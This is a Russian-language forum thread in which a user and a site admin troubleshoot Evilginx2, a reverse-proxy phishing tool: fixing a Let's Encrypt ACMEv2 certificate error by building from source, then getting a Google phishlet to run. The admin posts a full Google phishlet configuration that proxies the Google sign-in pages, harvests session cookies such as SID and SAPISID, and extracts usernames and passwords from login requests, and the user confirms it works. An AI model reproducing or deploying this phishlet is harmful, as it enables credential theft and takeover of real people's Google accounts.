Evilginx2 -- SSL сертификат и ACMEv2  

  RSS

Biobeat
(@biobeat)
Active Member
Присоединился: 2 недели назад
Сообщения: 5
11/02/2020 8:41 пп  

Hi!  Letsencrypt больше не дает работать с ACMEv1 новым доменам и теперь в Evilginx2 не ставится SSL сертификат --  acme: Error 403 - urn: acme: error: unauthorized - Account creation on ACMEv1 is disabled. Please upgrade your ACME client to a version that supports ACMEv2 / RFC 8555. See удаленная ссылка for details  Все issues по этому вопросу у kgertzky --> 404. Есть какой нибудь выход?

This topic was modified 2 недели назад 2 times by Biobeat

Цитата
MiAl
 MiAl
(@mial)
Участник Admin
Присоединился: 1 год назад
Сообщения: 141
11/02/2020 8:57 пп  

Эту ошибку исправили давно, четыре месяца назад — 11 октября 2019 года в версии evilginx2 2.3.2. То есть просто переустановите evilginx2 на новую и всё должно заработать. Инструкция по установке есть здесь: https://kali.tools/?p=4761

Здесь можно посмотреть журнал изменений: https://github.com/kgretzky/evilginx2/blob/master/CHANGELOG

2.3.3

  • Fixed: Multiple concurrent map writes when whitelisting IPs during heavy loads.

2.3.2

  • ACMEv2 support added to comply with LetsEncrypt requirements. - добавлена поддержка ACMEv2 для соблюдения требований LetsEncrypt
  • Fixed session cookie output to support EditThisCookie on the latest Chrome version.
  • Increased timeouts for proxying HTTP packets to 45 seconds.
  • Added support for Go modules.

ОтветитьЦитата
Biobeat
(@biobeat)
Active Member
Присоединился: 2 недели назад
Сообщения: 5
11/02/2020 10:03 пп  

Спасибо большое! Но если ставить по инструкции на kali tools то он ставит 2.3.0.  А может быть такое что надо компилировать чтобы поднять версию? Installing from source ---> Instructions above can also be used to update evilginx2 to the latest version.  а если Installing from precompiled binary packages ---> то ссылка ведет на 2.3.0 zip. Простите я может что-то упускаю.


ОтветитьЦитата
MiAl
 MiAl
(@mial)
Участник Admin
Присоединился: 1 год назад
Сообщения: 141
11/02/2020 10:11 пп  

Вы всё верно заметили, поскольку установка делается из предварительно скомпилированного файла со страницы https://github.com/kgretzky/evilginx2/releases , а там, как можно увидеть, автор не выкладывает новые файлы.

Сейчас добавлю инструкцию по установке из исходного кода — в этом случае установится последняя версия. После этого ещё раз напишу здесь на форуме.


ОтветитьЦитата
MiAl
 MiAl
(@mial)
Участник Admin
Присоединился: 1 год назад
Сообщения: 141
11/02/2020 10:26 пп  

Всё готово, сюда: https://kali.tools/?p=4761 добавил новые команды — перейдите к разделу «Установка из исходного кода».

Ещё раз спасибо, что обратили внимание на проблему — до меня не сразу дошло, что автор забыл выложить исполнимые файлы для последних релизов.


ОтветитьЦитата
Biobeat
(@biobeat)
Active Member
Присоединился: 2 недели назад
Сообщения: 5
11/02/2020 11:00 пп  

Спасибо большое!


ОтветитьЦитата
Biobeat
(@biobeat)
Active Member
Присоединился: 2 недели назад
Сообщения: 5
13/02/2020 3:42 пп  

Простите пожалуйста тут еще один момент - Может я ошибаюсь но дорога теперь чтобы загружать дополнительные фишлеты другая, если версия 2.3.0.  команда mv phishlets-master/* phishlets/ работала то с версией 2.3.3  нет.  Они вроде как теперь хранятся тут /usr/share/evilginx/phishlets/    Но вопрос в другом я в дополнительный phishlets поставил Google но он категорически отказывался запускаться. В readme я нашел что для google нужно чтобы домен был американский,  если я не ошибаюсь стояла гораздо ниже версия Evilginx двухлетней давности, и что -то про прокси но предложение на половине обрывается. Я так понимаю если старая версия Evilginx будет проблема с LetsEncrypt.  Есть какая нибудь возможность решить эту проблему? Спасибо

This post was modified 1 неделя назад 2 times by Biobeat

ОтветитьЦитата
MiAl
 MiAl
(@mial)
Участник Admin
Присоединился: 1 год назад
Сообщения: 141
14/02/2020 9:11 дп  

Да, при установке из исходного кода фишлеты хранятся по пути /usr/share/evilginx/phishlets.

Для Google я видел только фишлеты в формате старой версии evilginx2. Думаю, проблема именно в несовместимости версий, а не в домене.

Сам я не вникал в разработку фишлетов, поэтому не могу помочь. Нужно или искать актуальный для Google или просить сообщество сделать.

Кстати, есть не принятый запрос на внесение изменения в код: https://github.com/kgretzky/evilginx2/pull/315

Среди прочего, там создаётся файл phishlets/google.yaml со следующим содержимым:

name: 'google'
author: '@GregorioSecurity'
min_ver: '2.3.0'
proxy_hosts:
- {phish_sub: 'accounts', orig_sub: 'accounts', domain: 'google.com', session: true, is_landing: true}
- {phish_sub: 'ssl', orig_sub: 'ssl', domain: 'gstatic.com', session: true, is_landing: false}
sub_filters:
- {triggers_on: 'accounts.google.com', orig_sub: 'accounts', domain: 'google.com', search: 'https://{hostname}/signin/', replace: 'https://{hostname}/signin/', mimes: ['text/html', 'application/json', 'application/javascript', 'application/xhtml+xml', 'application/xml']}
- {triggers_on: 'accounts.google.com', orig_sub: 'accounts', domain: 'google.com', search: 'https://{hostname}/speedbump/', replace: 'https://{hostname}/speedbump/', mimes: ['text/html', 'application/json', 'application/javascript', 'application/xhtml+xml', 'application/xml']}
- {triggers_on: 'accounts.google.com', orig_sub: 'accounts', domain: 'google.com', search: 'href="://{hostname}', replace: 'href="https://ssl.{hostname}', mimes: ['text/html', 'application/json', 'application/javascript', 'application/xhtml+xml', 'application/xml']}
- {triggers_on: 'accounts.google.com', orig_sub: 'accounts', domain: 'google.com', search: 'https://{hostname}/CheckCookie', replace: 'https://{hostname}/CheckCookie', mimes: ['text/html', 'application/json', 'application/javascript', 'application/xhtml+xml', 'application/xml']}
auth_tokens:
- domain: '.google.com'
keys: ['SID', 'HSID', 'SSID', 'APISID', 'SAPISID', 'NID','CGIC','SNID', 'LSID','1P_JAR',]
- domain: 'accounts.google.com'
keys: ['GAPS', 'LSID']
credentials:
username:
key: 'f.req'
search: '\[*\[\"(.+?)\"'
type: 'post'
password:
key: 'f.req'
search: '\[.*\[\"(.+?)\"'
type: 'post'
login:
domain: 'accounts.google.com'
path: '/signin/v2/identifier'
path: '/ServiceLogin/identifier'

Сам я не тестировал, но есть шанс, что заработает.

This post was modified 1 неделя назад by MiAl

ОтветитьЦитата
Biobeat
(@biobeat)
Active Member
Присоединился: 2 недели назад
Сообщения: 5
14/02/2020 11:53 дп  

Опять большое вам спасибо! Все заработало.

 


ОтветитьЦитата
emilyoq750
(@emilyoq750)
New Member
Присоединился: 6 дней назад
Сообщения: 1
17/02/2020 2:47 пп  

Hi,

 

I want to take a moment and say thank you for this great info.

Did the phishlet work as intended ?

 

Thank you for your response


ОтветитьЦитата
Share:

Пожалуйста, Вход или Зарегистрироваться